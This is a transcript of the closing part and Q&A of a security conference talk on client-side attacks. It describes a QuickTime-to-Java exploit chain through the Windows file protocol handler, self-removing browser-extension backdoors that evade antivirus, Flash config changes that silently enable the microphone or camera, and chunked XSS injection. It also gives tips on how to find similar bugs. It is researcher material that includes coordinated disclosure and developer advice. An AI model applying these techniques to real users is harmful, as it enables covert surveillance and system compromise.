the exploit is going to happen like this. First of all, QuickTime opens this thing. Then it's going to pass it to file protocol handler function. The file protocol handler function is going to open up and say, "Oh, that's a link file. Let's open it as a link file." The link file is going to open up, but the link file is going to specify a different target. And the target is going to be, "Oh, by the way, now I'm going to reverse the slashes. I'm going to remove this file thing. It's going to be like reverse slash and 172 again slash evo.jar. So when this thing happens, now we're using like combination of three or four technologies linked together in the right order. When this thing happens is that now you're previewing a QuickTime file which leads to a local exploitation of your stuff. So now it's going to, a Java file is going to execute with your privileges. So we have the diagram here. Basically, QuickTime instructs Windows to attack Java. QuickTime the good guy, Windows the bad guy, and Java is the third guy. As I said, that's the new way of doing things. It's more twisted, it's a little bit more complicated, but the result is pretty much the same. Now, before actually, I mean, I think that I have about 20 minutes. I'm going to leave 10 minutes for actually question and answers. But there was actually a topic which I removed from this this slide because I thought I'm not going to have enough time. The topic is about backdoors. Now, the thing is that with the backdoors, when we actually start using backdoors and like viruses and stuff like this, and we combine them with client-side technology, we have a very, very, very powerful mechanism, very powerful combination. Most of the Trojan horses are written in the exact same old way. We're using binaries. But if we actually go ahead and exploit, we actually backdoor the browser, you know, for example, we add a simple invisible extension, and the extension can remove itself, for example, Firefox browser, right? Now, how the hell the antivirus engine will go there and it actually detect that thing? I mean, and moreover, Java, because the Firefox browser is written on the top of like standard technologies such as XML and Java, this JavaScript, these technologies are very highly mutatable. I mean, they're polymorphic technologies. So we can actually take a simple piece of JavaScript and it very easily can morph it to hundreds of thousands of variations of the same thing with a single command. So you cannot actually go ahead and write a signature. You can actually create a software that analyzes what the hell this JavaScript does and basically prevents it from executing before getting to the Chrome zone. A lot of technologies, for example, in your desktop are based on JavaScript and you don't realize. Adobe, for example, Adobe Reader is based on JavaScript. You can run JavaScript in it. If you have Photoshop, that executes JavaScript, Flash executes JavaScript, the browser executes JavaScript, and also the standard operating system, Windows, executes JavaScript as well in the form of JScript. And this is again the Windows scripting host. So now we have a very powerful technologies out there, which by themselves are very, I mean, they're actually good for, we use them for good purposes to like read their websites and do all sorts of cool things, but by themselves, they're actually gapping holes to the whole security thing. I mean, Flash, for example, by itself, you can actually mount a couple of files on the Flash, on the operating system to make the Flash the complete backdoor of all, you know? Can actually now after changing this config files, now when you visit some website, that website will be able to launch the microphone without even asking you. So they'll be able to actually record what exactly the sound in the room, survey the sound. In some cases, you'll be even be able to actually open the camera without even asking. Of course, you're going to see a green light if you have a green light on your camera, but. Perhaps in the future, people will be able to take pictures of you, and they will be able to do other things as well. And all it takes is to put a couple of files here and there, do a couple of modifications in the registries, or do a couple of modifications in some config files, and suddenly you have a backdoor which is not quite easy to detect. It's not so easy, because we don't know whether this was the intentional change. And then pretty much summarizes the client-side security talk. And as you understand, it's a quite big subject. And perhaps we can write a couple of books on it. But again, my philosophy is that we should not take it out of the context. We should look at, again, together with the server side and the client side to understand both sectors. We cannot just talk about client-side security issues. And if you have any questions, perhaps this is not the right time to do that.
Hello. I have a wireless mic over here. If anyone has a question, if you want to raise your hand, I'll pass it around.
Hello. Oh, yeah. In that second last attack you demonstrated with Java being the last execution point, why does the link need to contain Java? Why can't you execute your commands straight in the link file?
Yes, it's a good question. Okay, the thing is that Windows Service Pack 2 comes with a lot of like security enhancements. I believe it's Windows Service Pack 2. One of these things is that if I try to launch an application which is in a netbar share, I'm going to be asked whether I really want to do that, because the application, of course, is not signed by Microsoft or anyone that is trusted. So I'll be get this dialog box that is going to say, "Do you really want to run it? Cancel or okay?" The thing is that when I execute this thing from the file protocol handler, I don't even actually see that message. So the file protocol handler function is going to ignore it if it's not signed correctly. So the only thing that we can do is basically point it to a file which Windows does not recognize as an executable file. I cannot even run JavaScript files or VB file. I cannot run .dot application files or any of that sort, even screensaver files, even bat files, because they're recognized as executables by the operating system, and the operating system will prevent you from actually executing a file located in some untrusted share. But the operating system does not know anything about jar, because jar is handled by Java. And therefore, the operating system, Windows, does not actually know that jar files are actually executable files. So if the jar file has the correct manifest file, suddenly if you double-click it, it opens as an application. So I'm using Java in this case as the final point of exploitation. But in fact, you can actually use something called GSX, for example, if you have Photoshop installed or some of this stuff. Because GSX is again is an executable file, but is not recognized by the operating system as such. You can also execute a team file. For example, something.team for your GTalk client or for your Skype client or something like this. Most of the time, these team files are actually simple HTML or CSS files, which is going to be rendered within your browser. And of course, you can include some JavaScript inside as well. But because the JavaScript actually renders within this unrestricted sandbox, I cannot even call it as a sandbox. In a restricted version of the Internet Explorer, you have, again, complete access to the Windows scripting host. You can actually launch any other file. So in this case, it was just Java. are used as a method of exploitation.
Other questions?
Front.
Yeah, hi there. I have a question in the section of XCS, the cross-content scripting. You mentioned something about 10 characters, where it can only read chunks of 10 characters. And is that only in the case of a cross, like a domain policy type of restriction or whatever?
No, I give just this thing as an example, just to show that there is a huge, basically, misconception about this type of attacks. And there is, of course, it's reasonable. A lot of people, I mean, they're by themselves, they're very simple. Everybody can understand them. They're not very complicated to exploit them. And that, I think this is the danger of it, right? I mean, everybody can go now and find a cross-site scripting in a bunch of products and start making serious money with them. My point, I was just trying to show another variation of a cross-site scripting attack, which is a little bit weirder. So it's not really straightforward. It requires a little bit of a knowledge. You cannot, if somebody tells you that they can run a scanner and detect cross-site scripting attacks, they lie to you because it's not possible. I mean, I've seen cross-site scripting attack where you inject it in one place and occurs in a completely different place. It's not possible to follow that logic in any possible way. The permutation, the levels of permutations are so much that it's easier to brute force, you know, the TXIDs with, you know, the port randomization for the DNS to, you know, hijack the DNS than actually doing that. And actually, this is super complicated. So I just gave it as an example of a type of attack, a cross-site scripting attack that's slightly different. I mean, certain type, for example, the Firebug exploit is, again, there is a restriction in number of characters. So in order to actually overcome that restriction, we have to chop up the information that we inject into smaller pieces. And we actually inject it in smaller pieces. And when these pieces, all of them arrive into the context, then we can actually evaluate them, expand them, you know, do all the interesting things with them. And again, there's always limitations, and there will be limitations that we need to, I mean, if you're an attacker, you need to actually overcome.
Yes, for the attacks that specifically involve the QuickTime player and the Flash player, I was a little lost on what to do about it, actually. If we're running the latest version of Flash player and QuickTime player, does it pretty much handle those or plug those holes?
For this particular exploit, if you run the latest version of QuickTime, you're safe. The thing is that I'm actually giving you a tip here. In fact, you can find this vulnerability across the board. You can find it everywhere. Just find an application. This is the steps. Find an application that accepts URL in some format, and it sends that URL to the file protocol handler function. Now, if you find this thing, and in fact, there's so many tools that you can use out there that will tell you that thing. I think there's a bunch of them developed by Red Hat Security, I believe. But yeah, if you find the condition where you have a URL somewhere within the file document or something, I don't know, web page or whatever, and that URL gets rendered into the file protocol handler function, gets sent right there, you have the same exploit. It's the exact same way, it works in the exact same environment. So actually you're not safe, yeah, because the file protocol handler function is designed to work like that. And that's pretty much it. Again, you can keep up with patches, you can keep up with the latest updates, but there will always be similar attacks.
Other questions?
Any questions? Yeah, there's one over there.
Just on the Apple thing for a second, in the description in the Black Hat guide that said you may have a zero day on Apple if they let you talk about it. Is that still the case? Did Apple?
That's the QuickTime thing.
So that was the one from Firefox then?
No. That was the last thing. Basically, that vulnerability works not only on Windows. I used the variation of Windows, right? But actually, that vulnerability works in Apple environments as well. Because basically it's a similar situation. And as I said, this is just an example of the same attack. So if you actually think of a buffer overflow as a type of attack, right, you can take the same thing and apply it across many other applications. So as I said, any application that accepts a URL and it passes that URL into the for the Windows operating system, for the file protocol handler function, then you have the exact same exploitable condition, like exactly the same. And that was basically the zero day, which I did not disclose, but I disclosed it through ZDI. They handled the disclosure process and actually further research into this topic. So that's pretty much the zero day. I mean, talking about zero days, I was talking the other day with Nathan, another guy, and a couple of other guys, Billy Rios and other guys who are actually very much involved into this client-side security thing. We came to the conclusion that there's so many exploits, so many exploitable conditions that it's actually for us impossible to handle them all. So now we are thinking how to give them away to people to actually continue researching them, because you know you have like a bunch of stuff. I mean, just the other day I was looking into some other things for web start, and again it's impossible to do this command fixation attacks in Java web start now. There was another condition where you can actually, if you design a specifically crafted URL with some slashes and other weird characters, you'll be able to open a file protocol URLs within the folders of the Firefox browser. So now, for example, if you manage to cache some of the files there, you can use that attack to actually open the cache within the file protocol. And in the file protocol, it's actually a lot more relaxed than the HTTP protocol. You can do a lot more things. It's essentially, you can read files, at least. You can read files and you can send these files across some other web server. But yeah, you know, in client-side world, the zero days is not like a new thing. You know, it's just it's a part of the daily routine. You know, there's so many of them. Seriously, if you go yourself, just like don't go and just actually concentrate on finding a vulnerability. Just look at technology, the way it works. I personally myself, for most of the research that I do, I don't actually specifically say, okay, now today I'm going to go and look into QuickTime and just find a bug, you know, and then put my time in QuickTime. It doesn't happen like that. In fact, this vulnerability was found during our stay in Dubai. Actually, we missed our flight. We had to stay in the airport. I had nothing else to do, so I was actually messing around with things, and I had no, you know, interesting stuff to mess around. So I was looking into some of my notes, and just one thing led to another, and you find a vulnerability. If you follow the same strategy, I can guarantee you, you know, 100% success. You're going to find something, whether it's going to be something that you can use for mass exploitation or whether it's something that you can use in very specific cases. I'm sure you can find something. Any other questions?
We've got time for one more question.
Do you have any pointers for developers that could help scrub out such as the handler from already contaminated code, such as if someone has developed a rich internet application and they've already got you know, the application developed, but it requires something like QuickTime, and the client's QuickTime has already been exposed to some kind of backdoor or something like that?
Yeah. Well, it's a very difficult question. The thing is that I can tell you that it's possible. It's not exactly. You know, for example, if we go back to this, let's say buffer overflows or any of that sort of thing, I can tell you, yeah, basically make sure that you put enough. You know how many characters you put into your buffers, and then you're solved. You know, you solve the problem. In this case, you need to actually have understandings of how technologies interact with each other. I mean, Java by itself is not just Java. And QuickTime by itself is not just QuickTime. QuickTime actually embeds so many other technologies inside that it's not even funny. QuickTime is also an editor. It's a movie editor. QuickTime also has facilities to operate with Java applications, so it can speak to JavaLand. JavaScript can speak to Java straight away without actually, you know, basically talking, embedding applets. You have LightConnect. You have a lot. You have an intermix of technologies. And because this is how the web, this is how all these very rich technologies were designed, of course, the design process of this technology was, how can I say, they just happened to be that way. They just happened to be designed in that way. So you need to have a very clear understanding of what exactly you're doing in order to prevent, you know, in order to actually develop against this type of attacks. But yeah, just keeping with the latest stuff is actually enough. If it's just with the latest research, with the latest type of vulnerabilities, it's going to be enough to actually know how to secure these applications, how to design them to be secure. But also, I have a few things to say about the way we write applications. We often write them in this object, object-oriented programming sort of thing, which is fine if I'm actually a single developer and I design the whole and program the whole application by myself because I know exactly how each objects work. But in a more complex system where different components were designed and engineered by other different people, it's not very clear. It's not often clear how these components interact with each other. So even if you follow the specs, it's often to actually, because we engineered them separately. So for example, one of the developers engineered them in a certain way. A different engineer actually creates a component in a completely different way. And when we put them together, we have a problem. Suddenly, just a problem emerges because these systems happen to be quite complicated. And of course, we have no knowledge. We have a black box knowledge of that component. We have no idea how this component was written. We have no idea how what functions are used there. We all know is that if we create an instance of that object and we pass these parameters, it should work, right? But probably the developer forgot to sanitize certain things or forgot to actually, apply some security things. Maybe he was thinking that these security checks will actually happen before execution of that function, you know? So it's really complicated.
But do you guys have any other questions? If you could take them outside, we're going to wrap things up. Thank you very much.
Thank you.